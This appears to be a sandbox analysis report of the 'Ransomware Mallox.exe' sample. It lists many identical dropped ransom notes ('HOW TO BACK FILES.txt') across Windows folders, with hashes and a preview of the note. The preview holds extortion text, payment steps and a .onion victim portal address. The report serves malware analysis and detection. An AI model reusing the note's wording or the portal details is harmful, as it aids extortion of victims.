                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\Microsoft\Windows\Templates\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\WindowsHolographicDevices\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\ProgramData\WindowsHolographicDevices\SpatialStore\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Recovery\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Recovery\WindowsRE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\Microsoft\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\Microsoft\Windows\History\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Local\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
